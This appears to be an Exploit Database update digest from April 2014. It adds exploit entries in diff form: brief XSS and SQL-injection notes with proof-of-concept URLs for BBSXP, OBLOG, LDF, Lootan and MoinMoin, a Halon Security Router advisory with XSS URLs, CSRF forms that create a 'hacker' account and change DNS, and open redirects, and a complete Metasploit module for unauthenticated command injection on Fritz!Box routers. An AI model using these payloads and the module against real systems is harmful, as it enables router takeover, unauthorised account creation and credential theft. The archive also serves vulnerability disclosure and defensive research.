Updated 04_10_2014

platforms/asp/webapps/32748.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33411/info
+
+BBSXP is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+BBSXP 5.13 and prior are vulnerable.
+
+http://www.example.com/bbs/error.asp?message=xss 

platforms/asp/webapps/32750.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33416/info
+
+OBLOG is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/oblog/err.asp?message=xss 

platforms/asp/webapps/32756.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33431/info
+
+LDF is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[ldf path]/login.asp?user=[SQL COMMAND] 

platforms/asp/webapps/32758.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33439/info
+
+Lootan is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/[path]/login.asp?username=[SQL COMMAND] 

platforms/cgi/webapps/32746.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33365/info
+
+MoinMoin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to MoinMoin 1.8.1 are vulnerable.
+
+http://www.example.com/moinmoin/WikiSandBox?rename="><script>alert('rename xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script> 

platforms/hardware/remote/32743.txt

@@ -0,0 +1,119 @@
+ADVISORY INFORMATION
+Advisory Name: Multiple Security Vulnerabilities in Halon Security Router
+Date published: 2014-04-07
+Vendors contacted: Halon Security (http://www.halon.se)
+Researcher: Juan Manuel Garcia (http://www.linkedin.com/in/juanmagarcia)
+
+
+
+VULNERABILITIES INFORMATION
+Vulnerabilities:
+1. Reflected Cross-Site Scripting (XSS) {OWASP Top 10 2013-A3}
+2. Cross-site Request Forgery (CSRF) {OWASP Top 10 2013-A8}
+3. Open Redirect {OWASP Top 10 2013-A10}
+
+Severities:
+1. Reflected XSS: Medium - CVSS v2 Base Score: 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N)
+2. CSRF: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
+3. Open Redirect: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
+
+Affected Applications: Security router (SR) v3.2-winter-r1 and earlier.
+
+Affected Platforms: Software, virtual and hardware
+
+Local / Remote: Remote
+
+Vendor Status: Patched
+
+
+
+VULNERABILITIES DESCRIPTION
+1. Reflected XSS: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
+2. CSRF: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
+3. Open Redirect: https://www.owasp.org/index.php/Open_redirect
+
+
+
+TECHNICAL DESCRIPTION AND PROOF OF CONCEPTS
+1- Reflected XSS:
+At least the following parameters are not properly sanitized:
+ http://sr.demo.halon.se/commands/logviewer/?log=vic0';</script><script>alert(1)</script>
+Parameter: log
+ http://sr.demo.halon.se/fileviewer/?file=";</script><script>alert(1)</script>
+Parameter: file
+ http://sr.demo.halon.se/system/graphs/?graph='+alert(1)+'
+Parameter: graph
+ http://sr.demo.halon.se/commands/?command='+alert(1)+'
+Parameter: command
+ http://sr.demo.halon.se/system/users/?id='+alert(1)+'
+Parameter: id
+ http://sr.demo.halon.se/config/?uri='+alert(1)+'
+Parameter: uri
+Other parameters of the application might also be affected.
+
+
+2- CSRF:
+At least the following functions are vulnerable:
+ Add user: http://xxx.xxx.xxx.xxx/system/users/?add=user
+
+<html>
+<body>
+<form method="POST" name="form0" action="http://localhost:80/system/users/?add=user">
+<input type="hidden" name="checkout" value="17"/>
+<input type="hidden" name="apply" value=""/>
+<input type="hidden" name="id" value=""/>
+<input type="hidden" name="old_user" value=""/>
+<input type="hidden" name="user" value="hacker"/>
+<input type="hidden" name="full-name" value="ITFORCE H4x0r"/>
+<input type="hidden" name="class" value=""/>
+<input type="hidden" name="password" value="1234"/>
+<input type="hidden" name="password2" value="1234"/>
+</form>
+</body>
+</html>
+
+DNS configuration: http://xxx.xxx.xxx.xxx/network/dns
+
+<html>
+<body>
+<form method="POST" name="form0" action="http://localhost:80/network/dns/">
+<input type="hidden" name="checkout" value="17"/>
+<input type="hidden" name="apply" value=""/>
+<input type="hidden" name="name-servers" value="8.8.8.8"/>
+<input type="hidden" name="search-domain" value=""/>
+<input type="hidden" name="host-name" value="sr.demo.halon.se"/>
+</form>
+</body>
+</html>
+
+ Network Configuration: http://xxx.xxx.xxx.xxx/network/basic
+ Load Balancer Configuration: http://xxx.xxx.xxx.xxx/network/loadbalancer
+ VPN Configuration: http://xxx.xxx.xxx.xxx/network/vpn
+ Firewall Configuration: http://xxx.xxx.xxx.xxx/network/firewall
+Other functions of the application might also be affected.
+
+
+3- Open Redirect:
+At least the following parameters are not properly sanitized:
+ http://sr.demo.halon.se/cluster/?switch_to=&uri=http://itforce.tk
+Parameter: uri
+ http://sr.demo.halon.se/config/?checkout=17&uri=http://itforce.tk
+Parameter: uri
+Other parameters of the application might also be affected.
+
+
+
+SOLUTION
+Install / Upgrade to Security router (SR) v3.2r2
+REPORT TIMELINE
+
+2014-04-03: IT Force notifies the Halon team of the vulnerabilities and receives the support ticket ID ZOJ-105816.
+2014-04-04: Vendor acknowledges the receipt of the information and informs that the vulnerabilities are going to be resolved in v3.2r2 and updates the SR online demo site.
+2014-04-04: IT Force advises Halon on how to resolve the vulnerabilities reported.
+2014-04-04: IT Force coordinate with Halon the advisory publication for April 07,2014.
+2014-04-07: IT Force published the advisory.
+
+
+
+CONTACT INFORMATION
+www.itforce.tk

platforms/hardware/remote/32753.rb

@@ -0,0 +1,102 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStagerEcho
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Fritz!Box Webcm Unauthenticated Command Injection',
+      'Description' => %q{
+          Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection.
+        This module was tested on a Fritz!Box 7270 from the LAN side. The vendor reported the
+        following devices vulnerable: 7570, 7490, 7390, 7360, 7340, 7330, 7272, 7270,
+        7170 Annex A A/CH, 7170 Annex B English, 7170 Annex A English, 7140, 7113, 6840 LTE,
+        6810 LTE, 6360 Cable, 6320 Cable, 5124, 5113, 3390, 3370, 3272, 3270
+      },
+      'Author'      =>
+        [
+          'unknown', # Vulnerability discovery
+          'Fabian Braeunlein <[email protected]>', #Metasploit PoC with wget method
+          'Michael Messner <[email protected]>' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'OSVDB', '103289' ],
+          [ 'BID', '65520' ],
+          [ 'URL', 'http://www.kapple.de/?p=75' ],                       #vulnerability details with PoC
+          [ 'URL', 'https://www.speckmarschall.de/hoere.htm' ],          #probably the first published details (now censored)
+          [ 'URL', 'http://pastebin.com/GnMKGmZ2' ],                     #published details uncensored from speckmarschall
+          [ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], #vendor site with a list of vulnerable devices
+          [ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] #wirteup with PoC
+        ],
+      'DisclosureDate' => 'Feb 11 2014',
+      'Privileged'     => true,
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_MIPSLE,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets' =>
+        [
+          [ 'Automatic Targeting', { } ],
+        ],
+      'DefaultTarget'  => 0
+      ))
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri'    => '/cgi-bin/webcm',
+        'method'  => 'GET'
+      })
+
+      if res && [200, 301, 302].include?(res.code)
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def execute_command(cmd, opts)
+    begin
+      res = send_request_cgi({
+        'uri'    => '/cgi-bin/webcm',
+        'method' => 'GET',
+        'vars_get' => {
+          "var:lang" => "&#{cmd}",
+        }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the vulnerable URL...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    execute_cmdstager(
+      :linemax => 90
+    )
+  end
+end